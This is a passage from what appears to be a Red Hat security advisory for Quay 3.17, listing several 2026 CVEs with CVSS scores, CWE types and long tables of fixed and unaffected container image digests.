Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Important

CVE-2026-32280

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix

Known not affected 27 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64		—

Threats

Impact Important

CVE-2026-32281

5.9 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1050 - Excessive Platform Resource Consumption within a Loop

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Moderate

CVE-2026-32282

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE-367 - Time-of-check Time-of-use (TOCTOU) Race Condition

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Moderate

CVE-2026-32286

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1285 - Improper Validation of Specified Index, Position, or Offset in Input

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Important

CVE-2026-32589

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CWE-639 - Authorization Bypass Through User-Controlled Key

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix

Known not affected 27 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64		—
